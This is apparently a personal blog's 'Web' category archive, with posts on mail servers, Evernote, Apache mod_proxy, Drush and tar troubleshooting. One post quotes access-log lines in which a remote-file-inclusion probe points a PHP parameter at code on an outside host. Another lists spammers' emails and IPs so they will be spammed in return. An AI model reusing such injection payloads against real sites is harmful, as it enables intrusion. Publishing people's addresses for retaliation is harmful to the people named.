Autarchy of the Private Cave

Tiny bits of bioinformatics, [web-]programming etc

    • Archives

    • Recent comments

    Archive for the 'Web' Category

    Anything web-related. Just anything.

    Mail-in-a-box, Sovereign, Modoboa, iRedMail, etc

    28th December 2016

    Preparing to dismantle my physical server (and move different hosted things to one or more VPS),
    I’ve realized that an email server is necessary: to send website-generated emails, and also
    receive a few rare contact requests arriving at the websites.

    My current email server was configured eons ago, it works well,
    but I have no desire to painfully transfer all the configuration…
    Better install something new, shiny and exciting, right? :)

    I had 3 #self-hosted, #mail-server bookmarks:

    (Sovereign, the 4th one, was addded after reading more about Mail-in-a-box.)

    Here are my notes on what seemed important about these 4.
    Read the rest of this entry »

    Share

    Posted in *nix, Comparison, Links, Notepad, Software, Web | No Comments »

    Evernote web-interface beta: how to fix: saved searches are crossed out and do not work

    9th May 2016

    Another symptom is a message along the lines of

    the notebook you are searching in has been moved or renamed since the saved search was created

    (which is not true).

    I had this problem, and found a solution.

    Go to your Evernote on a client where you can edit saved searches (Windows for me),
    edit all the searches, and make sure that notebook name is quoted in the search (and also, possibly, with all proper letter cases).

    I found this solution by first creating a search from the web-beta interface, it looked like this: notebook:"Mynotebook" tag:1-now
    All the crossed-out searches (despite working totally fine on Windows) looked like this: notebook:Mynotebook tag:1-now
    or even like this (note the lower-case 1st letter of the notebook name): notebook:mynotebook tag:1-now.

    After editing saved searches and synchronizing, they all appear (and work) just fine in the beta web-interface.

    If you cannot edit your searches right now, there is another workaround: all the saved searches work fine for me from the Shortcuts menu (a star in the left panel).

    Hope this helps!

    Share

    Posted in how-to, Notepad, Software, Web | No Comments »

    Yandex probing for vulnerabilities in .UA domains?

    11th April 2016

    Here is a recent entry from my web-server’s access log:

    bogdan.org.ua:80 130.193.51.57 – - [09/Apr/2016:15:53:22 +0300] “GET /categories/programming?_SERVER[DOCUMENT_ROOT]=http://www.daedongfur.co.kr/shop/log/.logs/id1.txt HTTP/1.1″ 200 13158 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”

    Client’s IP 130.193.51.57 does belong to Yandex network range.

    So…

    • Had Yandex started looking for vulnerabilities in the web-sites it scans?
    • Does it only look for vulnerabilities in the .UA web-sites/domains?
    • Does Yandex really use a Korean web-site to host malicious code?

    In fact, there are more entries like that one, also from one of Yandex IPs:

    bogdan.org.ua:80 130.193.51.25 – - [04/Apr/2016:00:14:22 +0300] “GET /categories/programming/page/5?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12607 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”
    bogdan.org.ua:80 130.193.51.25 – - [04/Apr/2016:00:19:31 +0300] “GET /categories/programming/page/4?_SERVER%5BDOCUMENT_ROOT%5D=http%3A%2F%2Fwww.daedongfur.co.kr%2Fshop%2Flog%2F.logs%2Fid1.txt HTTP/1.1″ 200 12174 “-” “Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)”

    I can see 3 explanations, and all of them are bad for Yandex:

    • Yandex now belongs to KGB, and it does scan [.UA] web-sites for vulnerabilities;
    • some/many of Yandex crawler servers are compromised, and are used by malicious 3rd parties;
    • there was a public malicious link somewhere (???) to my blog, and Yandex blindly followed it.
    Share

    Posted in Misc, Web | No Comments »

    How to fix: mod_proxy’s ProxyPass directive does not work

    10th February 2016

    So… You had finally built a nice LXC container for your web-facing application, and even configured Apache (Debian package version 2.14.18-1 in my case) to serve some static/web-only components.
    From your client-side JavaScript UI you talk (in JSON) to the API, which is implemented as a separate node.js/Python/etc server – say, on port 8000 in the same LXC container.

    The simplest solution to forward requests from the web-frontend to your API is by using mod_proxy.
    If you want to forward any requests to /api/* to your custom back-end server on port 8000, you just add the following lines to your VirtualHost configuration:

    ProxyPass “/api” “http://localhost:8000″
    ProxyPassReverse “/api” “http://localhost:8000″

    I’d suggest not wrapping this fragment with the classical IfModule: as your application will not really work without its API back-end, you actually want Apache to fail as soon as possible if mod_proxy is missing.

    That was easy, right? What, it doesn’t work? Can’t be! It’s dead simple! No way you could make a mistake in 2 lines of configuration!!! :mad_rage: :)

    Oh wait… I remember I had this problem before… Read the rest of this entry »

    Share

    Posted in *nix, how-to, Web | No Comments »

    How to update a multisite Drupal 6/7 installation using Drush

    25th August 2014

    There are quite a lot of posts on how to do this, but my differs a tiny little bit, so I’m saving it for my own future reference, and also for the benefits of the wider audience.

    I am updating a multisite Drupal 6 installation. To the best of my knowledge, the only difference for Drupal 7 is that instead of the site_offline D6 variable the maintenance_mode variable is used in D7.

    On Debian stable and later, you can sudo aptitude install drush and then just use it immediately after that.

    Note: I recommend su webuser (or sudo -s followed by sudo -s -u webuser) before you run any non-testing drush commands, where webuser is the user which owns your web-exposed files (e.g. Debian’s default is, I think, www-data). I’ve seen a lot of recommendations to run drush as a super-user, but that does not make sense, and may actually cause problems with file ownership.

    One last thing before we start: if your drush seems to work fine but hangs when untarring modules – check this solution.

    Read the rest of this entry »

    Share

    Posted in *nix, Drupal, how-to, Notepad, PHP, Programming, Software, Web | 1 Comment »

    drush pm-update fails: tar hangs when extracting *.tar.gz module archives from drupal.org

    25th August 2014

    Drush is awesome, especially for updating multisite Drupal installations.
    I had only started using it a few days ago, and I’ve immediately hit a problem, to which I did find a workaround.

    Symptoms

    • running drush @sites pm-update results in normal execution up to after answering ‘y[es]‘; then drush seems to hang indefinitely (haven’t waited beyond about 10 minutes, maybe it does produce an error after a long while);
    • running the same command with --debug shows that drush hangs when trying to untar the downloaded module.tar.gz archive; there are no errors/warnings, it just hangs with no CPU usage;
    • trying to untar any of the modules downloaded from drupal.org manually is also unsuccessful: tar -xzvf module.tar.gz seems to do nothing, it also hangs with zero CPU usage/time and no warnings/errors;
    • interestingly, if I create some test.tar.gz locally, tar does happily extract that;
    • finally, running strace tar -xzvf module.tar.gz shows a number of unexpected lines, such as references to NSS and libnss files (I am only showing some of the lines of strace output, including the last line):

      open(“/etc/nsswitch.conf”, O_RDONLY) = 4
      read(4, “# /etc/nsswitch.conf\n#\n# Example”…, 4096) = 683
      open(“/lib/x86_64-linux-gnu/libnss_nis.so.2″, O_RDONLY) = 4
      open(“/lib/x86_64-linux-gnu/libnss_files.so.2″, O_RDONLY) = 4
      open(“/etc/passwd”, O_RDONLY|O_CLOEXEC) = 4
      open(“/usr/lib/x86_64-linux-gnu/libnss_mysql.so.2″, O_RDONLY) = 4
      open(“/etc/group”, O_RDONLY|O_CLOEXEC) = 4
      open(“/etc/libnss-mysql.cfg”, O_RDONLY) = -1 EACCES (Permission denied)
      open(“/etc/libnss-mysql-root.cfg”, O_RDONLY) = -1 EACCES (Permission denied)
      futex(0x7fd0816e8c48, FUTEX_WAIT_PRIVATE, 2, NULL

    Read the rest of this entry »

    Share

    Posted in *nix, Drupal, Notepad, Software | No Comments »

    The list of spammers emails

    13th November 2013

    All sane people agree that spam is a blight of the internet, be it email spam or comments spam or forum spam or any other form of unsolicited, blatant, shameless, out-of-context advertising. Multiple spam-fighting and spam-stopping systems are being developed.

    With automated spam, automated spam-fighting systems might be the only choice. Sending rightfully angry emails to ISPs to notify about their customers violating service agreements is probably a waste of effort (something tells me most of these complaints end up in the trash folder, or even in the… spam folder). However, I get a feeling that some spam is not automated – it appears to have been actually prepared and sent by a human. (Alternatively, spammers behind those spams simply have better software.) Anyway, some spams seem to contain valid contact data of the advertized entity – like an email.

    The resulting idea is very simple and was probably already implemented somewhere by someone: simply publish online contact emails of the entities which, apparently, had chosen spam as the primary means of advertising. These emails will be sooner or later harvested by spammers, added to spam databases, and will start getting progressively more spam.

    There are a few drawbacks to this approach:

    • knowing spam-collection points enables “black PR”-like mass-mailings in the name of one’s competitor, double-hurting the innocents; I do not see a clear method of preventing this, other than by concealing spam collection methods;
    • human intelligence is required to identify if the contained email truly belongs to the advertised entity; this is fairly time-consuming, especially when scaled up; a possible solution (with its own problems) would be to build an online gateway for submitting curated spam samples, thus distributing the workload to all the participating volunteers;
    • the next logical step is actually harvesting and then publishing all the emails from the advertised website;
    • the biggest drawback, however, is low efficiency of this approach; increasing spam percentage will only be a mild nuisance, which isn’t likely to propagate high enough to affect spam-deciders; also, indirectly spamming someone’s mailbox will result in the loss of time, which could have been otherwise used for facebook and other important activities :)

    What do you think? Should such a method be used?

    Below I provide a few sample records from real spam comments, which had true-looking emails. I’m including some extra meta-data. Ideally, this should be stored in some kind of a database.

    Submitted on 2013/11/13 at 15:23 GMT
    Author : Виктор (IP: 95.134.110.37 , 37-110-134-95.pool.ukrtel.net)
    E-mail : aionind@yandex.ru
    E-mail : sale@aion-industry.ru
    E-mail : info@aion-industry.ru
    Submitted on 2013/11/26 at 8:53 GMT
    Author : Виктор (IP: 95.134.146.235 , 235-146-134-95.pool.ukrtel.net)
    E-mail : kvazargr@yandex.ru
    E-mail : info@kvazar-gr.ru
    Submitted on 2013/11/28 at 7:24 GMT
    Author : Виктор (IP: 95.134.117.155 , 155-117-134-95.pool.ukrtel.net)
    E-mail : relevater@yandex.ru
    E-mail : info@relevate.ru
    E-mail : support@relevate.ru
    E-mail : billing@relevate.ru

    There’s definitely a need for a public database, API keys, and quorum algorithms…

    Author : casinoworka (IP: 91.207.4.201 , 201.4.207.91.unknown.SteepHost.Net)
    E-mail : pharmacywork7777777@gmail.com
    E-mail : info@prowessmedical.com

    Share

    Posted in Misc, Web | No Comments »